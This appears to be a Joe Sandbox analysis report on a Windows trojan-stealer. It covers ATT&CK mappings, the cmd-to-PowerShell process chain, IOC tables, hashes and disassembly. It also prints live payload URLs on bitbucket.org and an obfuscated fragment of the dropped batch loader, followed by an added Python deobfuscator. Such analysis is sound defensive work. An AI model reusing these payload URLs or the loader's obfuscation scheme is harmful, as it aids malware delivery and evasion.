        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C21130 LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary | 0_2_00007FF681C21130
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C28BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter | 0_2_00007FF681C28BF4
        Source: C:\Users\user\Desktop\0XVZC3kfwL.exe | Code function: 0_2_00007FF681C22D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle | 0_2_00007FF681C22D70
        MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the count of matched signatures for that technique)

        Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
        Resource Development: Scripting (1), Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
        Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
        Execution: Native API (2), Command and Scripting Interpreter (2), PowerShell (2), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
        Persistence: Scripting (1), DLL Side-Loading (1), Registry Run Keys / Startup Folder (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
        Privilege Escalation: DLL Side-Loading (1), Access Token Manipulation (1), Process Injection (11), Registry Run Keys / Startup Folder (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
        Defense Evasion: Obfuscated Files or Information (1), Install Root Certificate (1), Software Packing (1), Timestomp (1), DLL Side-Loading (1), Modify Registry (1), Virtualization/Sandbox Evasion (21), Access Token Manipulation (1), Process Injection (11), Rundll32 (1)
        Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
        Discovery: System Time Discovery (1), File and Directory Discovery (1), System Information Discovery (15), Security Software Discovery (1), Process Discovery (1), Virtualization/Sandbox Evasion (21), Application Window Discovery (1), System Owner/User Discovery, Network Sniffing, Network Service Discovery
        Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
        Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
        Command and Control: Ingress Tool Transfer (3), Encrypted Channel (21), Non-Application Layer Protocol (3), Application Layer Protocol (4), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
        Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Impact: System Shutdown/Reboot (1), Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
        Behavior Graph ID: 1524411, Sample: 0XVZC3kfwL.exe, Startdate: 02/10/2024, Architecture: WINDOWS, Score: 100

        Process chain: 0XVZC3kfwL.exe -> cmd.exe -> powershell.exe -> powershell.exe; cmd.exe also starts conhost.exe; rundll32.exe is started separately.
        Start node signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures.
        cmd.exe: Suspicious powershell command line found; Bypasses PowerShell execution policy.
        powershell.exe (first): Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading.
        powershell.exe (second): contacts bitbucket.org 185.166.143.49, port 443 (local ports 49704, 49705), AMAZON-02US, Germany; Installs new ROOT certificates.

Source | Detection | Scanner | Label | Link
0XVZC3kfwL.exe | 42% | ReversingLabs | Win64.Trojan.Leonem |
0XVZC3kfwL.exe | 100% | Avira | TR/Spy.Stealer.sgcso |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
http://crl.microsoft | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://aka.ms/pscore6 | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://oneget.orgX | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
https://oneget.org | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
bitbucket.org | 185.166.143.49 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723 | true | | unknown
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721 | true | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.166.143.49 | bitbucket.org | Germany | | 16509 | AMAZON-02US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524411
Start date and time: 2024-10-02 19:03:47 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 49s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 0XVZC3kfwL.exe
renamed because original name is a hash value
Original Sample Name: 278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c.exe
Detection: MAL
Classification: mal100.spre.evad.winEXE@9/6@1/1
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 29
• Number of non-executed functions: 36
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 4640 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtSetInformationFile calls found.
• VT rate limit hit for: 0XVZC3kfwL.exe

Time | Type | Description
13:04:51 | API Interceptor | 28x Sleep call for process: powershell.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • jasonj002.bitbucket.io/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        bitbucket.orgnTHivMbGpg.exeGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50
                                                                                        sRMytgfRpJ.exeGet hashmaliciousRedLineBrowse
                                                                                        • 185.166.143.49
                                                                                        envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.48
                                                                                        sostener.vbsGet hashmaliciousNjratBrowse
                                                                                        • 185.166.143.50
                                                                                        S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                                                                                        • 185.166.143.50
                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                        • 185.166.143.48
                                                                                        SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeGet hashmaliciousAmadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog StealerBrowse
                                                                                        • 185.166.143.50
                                                                                        file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                        • 185.166.143.50
                                                                                        https://www.getcoloringpages.com/coloring/359Get hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.48
                                                                                        HelperLibrary.ps1Get hashmaliciousUnknownBrowse
                                                                                        • 185.166.143.50
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| AMAZON-02 US | nTHivMbGpg.exe | malicious | Unknown | 185.166.143.50 |
| AMAZON-02 US | main_ppc.elf | malicious | Mirai | 34.249.145.219 |
| AMAZON-02 US | yakov.arm.elf | malicious | Mirai | 18.191.162.167 |
| AMAZON-02 US | yakov.arm7.elf | malicious | Mirai | 108.128.211.34 |
| AMAZON-02 US | novo.arm5.elf | malicious | Moobot | 54.171.230.55 |
| AMAZON-02 US | novo.arm64.elf | malicious | Mirai, Moobot | 54.218.85.75 |
| AMAZON-02 US | novo.arm7.elf | malicious | Mirai, Moobot | 108.156.207.191 |
| AMAZON-02 US | novo.ppc.elf | malicious | Mirai, Moobot | 54.124.163.228 |
| AMAZON-02 US | novo.ppc440fp.elf | malicious | Mirai, Moobot | 54.184.182.174 |
| AMAZON-02 US | novo.sh4.elf | malicious | Mirai, Moobot | 13.242.57.236 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| --- | --- | --- | --- | --- |
| 3b5074b1b5d032e5620f69f9f700ff0e | nTHivMbGpg.exe | malicious | Unknown | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | PO-A1702108.exe | malicious | AgentTesla, PureLog Stealer | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_OCTQTRA071244PDF.scr.exe | malicious | Unknown | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 185.166.143.49 |
| 3b5074b1b5d032e5620f69f9f700ff0e | doc_20241002_383767466374663543.exe | malicious | Snake Keylogger, VIP Keylogger | 185.166.143.49 |
                                                                                        No context
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):64
                                                                                        Entropy (8bit):0.773832331134527
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Nlllulp/t:NllU
                                                                                        MD5:5442F9D4E495E0E893EBB53D1D5FEAD0
                                                                                        SHA1:E6A541BDA8343980B1295901A05C1CEFBE3478CB
                                                                                        SHA-256:897E70C15D10F0405D7C5FF51A72638C434E84C32B64A2C319236D6C7EC82FA8
                                                                                        SHA-512:59815DFE6C0569DC3D26F893B04AA0E37852CDEB293705A886A804E9BAEFABB60577652C7CC31A60FBD2F13530BE9232B1C227BDE24D8D8860AAE621E8033656
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@...e.................................P.h.......................
                                                                                        Process:C:\Users\user\Desktop\0XVZC3kfwL.exe
                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (720), with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):12979
                                                                                        Entropy (8bit):5.612187145250781
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:vOgsMvGCbeWP/tuHFB1f22QrXUHcVZBZNc02BrfF0e5VGqBw3m77apwqx/nLTLvO:m2xibzfAZ2Bue55ka7ti3VfEE0
                                                                                        MD5:C0BCEC2ED74752892D9B06A8F86965C7
                                                                                        SHA1:5695D0E896B986C18AD3CD3F5D6A176283E1BF4D
                                                                                        SHA-256:E98CBF1C5F26F7A5A2C77B33F87D85A10EC20D82A2B6F82E271EE881C1A28DC6
                                                                                        SHA-512:52E16D35B38A52F71995E056A3A3C2E0B0229EA84656DDDC59C7D963A4DC27CBCD67C5ED36D5FD7445CA1052D019750656EAB2694BA7D2C607B4107615F7F356
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:@echo off..GOTO ............:............SET ..........=h#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I#..GOTO ............:............SET ..........=ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C#..GOTO ............:............SET ..........=#agBl#GM#d#Bb#F0#XQ#g#Cg#JwB0#Hg#d##u#G8#cgBG#EE#bQBj#G8#LwBz#GQ#YQBv#Gw#b..GOTO ............:............SET ..........=s#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#..GOTO ..........2..:............SET ..........=Bv#HI#Zw#v#Gg#ZwBk#GY#a#Bk#GY#ZwBk#C8#d#Bl#HM#d##v#GQ#bwB3#G4#b#Bv#GE#Z#B..GOTO ..........9..:............SET ....
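The preview above shows the obfuscation used by the dropped batch file: each SET line stores a slice of one long base64 string in which every 'A' has been replaced by '#', and the base64 wraps UTF-16LE PowerShell source (the fragments ZgBv#HI#ZQBh#GM#a##g and J#Bs#Gk#bgBr#HM#Ow#N##o# visible in the preview decode to foreach and $links;). The GOTO chain, not the file order, determines how the slices are joined. The Python decoder below is an added example and is not part of the Joe Sandbox report; the label and variable names, the 13-character slicing and the PowerShell text in the constructed sample are assumptions, only the two fragments just quoted are taken from the preview.

```python
import base64
import re

# Regexes for the three batch constructs the GOTO chain is built from.
LABEL_RE = re.compile(r"^\s*:(\S+)")
GOTO_RE = re.compile(r"^\s*GOTO\s+(\S+)", re.IGNORECASE)
SET_RE = re.compile(r"^\s*SET\s+([^=]+)=(.*)$", re.IGNORECASE)


def decode_fragment(chunk: str) -> str:
    """Undo the obfuscation seen in the dropped .bat: every 'A' of the base64
    text was replaced by '#', and the base64 wraps UTF-16LE PowerShell source.
    Padding is recomputed because the SET slices are cut at arbitrary offsets;
    a slice decoded on its own therefore loses its trailing partial character."""
    b64 = chunk.replace("#", "A").rstrip("=")
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - len(raw) % 2]          # drop a dangling odd byte
    return raw.decode("utf-16-le")


def recover_from_batch(text: str) -> str:
    """Walk the GOTO chain the way cmd.exe would, collecting the SET values in
    execution order (file order is not the right order), then decode once."""
    lines = text.splitlines()
    labels = {}
    for i, line in enumerate(lines):
        m = LABEL_RE.match(line)
        if m:
            labels.setdefault(m.group(1).lower(), i)
    chunks, pc, visited = [], 0, set()
    while pc < len(lines):
        line = lines[pc]
        m = GOTO_RE.match(line)
        if m:
            target = m.group(1).lstrip(":").lower()
            # GOTO :EOF ends the script; an unknown label or a revisited label stops us too
            if target == "eof" or target not in labels or target in visited:
                break
            visited.add(target)
            pc = labels[target] + 1
            continue
        m = SET_RE.match(line)
        if m:
            chunks.append(m.group(2).strip())
        pc += 1
    return decode_fragment("".join(chunks))


def obfuscate(script: str) -> str:
    """Inverse transform, used only to build the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii").replace("A", "#")


def build_sample_batch(script: str, piece_len: int = 13) -> str:
    """Constructed stand-in for the dropped .bat (hypothetical label/variable
    names): slices are cut at offsets that are not multiples of 4 and written
    to the file in reverse order, so only the GOTO chain restores the order."""
    blob = obfuscate(script)
    pieces = [blob[i:i + piece_len] for i in range(0, len(blob), piece_len)]
    blocks = []
    for n, piece in enumerate(pieces):
        nxt = f"GOTO part{n + 1}" if n + 1 < len(pieces) else "GOTO :EOF"
        blocks.append(f":part{n}\r\nSET chunk{n}={piece}\r\n{nxt}\r\n")
    return "@echo off\r\nGOTO part0\r\n" + "".join(reversed(blocks))


# Constructed PowerShell text for the round trip (not the sample's real script).
SAMPLE_SCRIPT = ("$links = @('http://example.invalid/a.jpg', 'http://example.invalid/b.jpg');\r\n"
                 "foreach ($l in $links) { Write-Output $l }")

if __name__ == "__main__":
    # Two slices copied from the report's file preview decode to PowerShell tokens.
    print(repr(decode_fragment("ZgBv#HI#ZQBh#GM#a##g")))      # 'foreach'
    print(repr(decode_fragment("J#Bs#Gk#bgBr#HM#Ow#N##o#")))  # '$links;\r\n'
    print(recover_from_batch(build_sample_batch(SAMPLE_SCRIPT)))
```

Pass the real .bat text to recover_from_batch() to obtain the PowerShell source. Decoding a single SET value in isolation only works when its slice happens to start on a 4-character base64 boundary, which is why the first slice in the preview (h#EY#cgBv...) does not decode on its own while ZgBv#HI#... does.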
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):60
                                                                                        Entropy (8bit):4.038920595031593
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                        Malicious:false
                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Entropy (8bit):6.173539047481159
                                                                                        TrID:
                                                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                        • DOS Executable Generic (2002/1) 0.92%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:0XVZC3kfwL.exe
                                                                                        File size:192'512 bytes
                                                                                        MD5:af93d5a246b37ce552356e6b61c9aec9
                                                                                        SHA1:e3f611e2601ff2bad622e2b1ccbdf8626f5cfd47
                                                                                        SHA256:278a762f5ed598ccee88a977853a7e6011759220b1095461f1c3e756a1ec725c
                                                                                        SHA512:6ca6791f72191aefcffb3e2e99b8035b082962f604263f6cf85727eadb9b6b7a9283d9259ebef7087dc567932a531143483cc4aab6787172ff3788edecc43879
                                                                                        SSDEEP:3072:3HwrxmMpvDITZg1S25vWp1icKAArDZz4N9GhbkENEkdY8r:ArMZNp0yN90vEA1
                                                                                        TLSH:5A146C0A67E420AAE4B5537459F2C2735A317CB15B74D6AF12C4AD7F3E236C0A532B07
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Kr..%!..%!..%!&. ..%!&.& ..%!&.! ..%!&.$ ..%!..$!b.%!&.- ..%!&..!..%!&.' ..%!Rich..%!................PE..d....y............"
                                                                                        Icon Hash:823092d2ec684430
                                                                                        Entrypoint:0x140008460
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x140000000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0xE28C79B4 [Sun Jun 11 09:36:52 2090 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:10
                                                                                        OS Version Minor:0
                                                                                        File Version Major:10
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:10
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:4cea7ae85c87ddc7295d39ff9cda31d1
Instruction (entry-point disassembly; the listing decodes the x86-64 code as 32-bit, so each dec eax, inc ecx, dec ecx or dec esp shown below is really the REX prefix byte of the 64-bit instruction that follows: dec eax / sub esp, 28h is sub rsp, 28h. The first four instructions, sub rsp, 28h / call / add rsp, 28h / jmp, are the usual MSVC CRT entry stub that calls __security_init_cookie and jumps to __scrt_common_main_seh.)
                                                                                        dec eax
                                                                                        sub esp, 28h
                                                                                        call 00007FD14CF16820h
                                                                                        dec eax
                                                                                        add esp, 28h
                                                                                        jmp 00007FD14CF1609Bh
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        int3
                                                                                        dec eax
                                                                                        mov dword ptr [esp+08h], ebx
                                                                                        dec eax
                                                                                        mov dword ptr [esp+10h], edi
                                                                                        inc ecx
                                                                                        push esi
                                                                                        dec eax
                                                                                        sub esp, 000000B0h
                                                                                        and dword ptr [esp+20h], 00000000h
                                                                                        dec eax
                                                                                        lea ecx, dword ptr [esp+40h]
                                                                                        call dword ptr [00000F8Dh]
                                                                                        nop
                                                                                        dec eax
                                                                                        mov eax, dword ptr [00000030h]
                                                                                        dec eax
                                                                                        mov ebx, dword ptr [eax+08h]
                                                                                        xor edi, edi
                                                                                        xor eax, eax
                                                                                        dec eax
                                                                                        cmpxchg dword ptr [000046C2h], ebx
                                                                                        je 00007FD14CF1609Ch
                                                                                        dec eax
                                                                                        cmp eax, ebx
                                                                                        jne 00007FD14CF160AFh
                                                                                        mov edi, 00000001h
                                                                                        mov eax, dword ptr [000046B8h]
                                                                                        cmp eax, 01h
                                                                                        jne 00007FD14CF160ACh
                                                                                        lea ecx, dword ptr [eax+1Eh]
                                                                                        call 00007FD14CF166B3h
                                                                                        jmp 00007FD14CF16119h
                                                                                        mov ecx, 000003E8h
                                                                                        call dword ptr [00000F3Bh]
                                                                                        jmp 00007FD14CF16056h
                                                                                        mov eax, dword ptr [00004693h]
                                                                                        test eax, eax
                                                                                        jne 00007FD14CF160F5h
                                                                                        mov dword ptr [00004685h], 00000001h
                                                                                        dec esp
                                                                                        lea esi, dword ptr [000011BEh]
                                                                                        dec eax
                                                                                        lea ebx, dword ptr [0000119Fh]
                                                                                        dec eax
                                                                                        mov dword ptr [esp+30h], ebx
                                                                                        mov dword ptr [esp+24h], eax
                                                                                        dec ecx
                                                                                        cmp ebx, esi
                                                                                        jnc 00007FD14CF160C1h
                                                                                        test eax, eax
                                                                                        jne 00007FD14CF160C1h
                                                                                        dec eax
                                                                                        cmp dword ptr [ebx], 00000000h
                                                                                        je 00007FD14CF160ACh
                                                                                        dec ecx
                                                                                        mov edx, 5E523070h
| Name | Virtual Address | Virtual Size | Is in Section |
| --- | --- | --- | --- |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa2b4 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x1ff2a | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xe000 | 0x42c | .pdata |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2f000 | 0x2c | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9a68 | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x9010 | 0x138 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9148 | 0x520 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| .text | 0x1000 | 0x7e40 | 0x8000 | d22d8a48c14d2185814d2ed24fb0aed1 | False | 0.546173095703125 | data | 6.092855112591348 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2340 | 0x3000 | 3748ff8966297360bdba725e2d585c23 | False | 0.318359375 | data | 3.84344715350442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
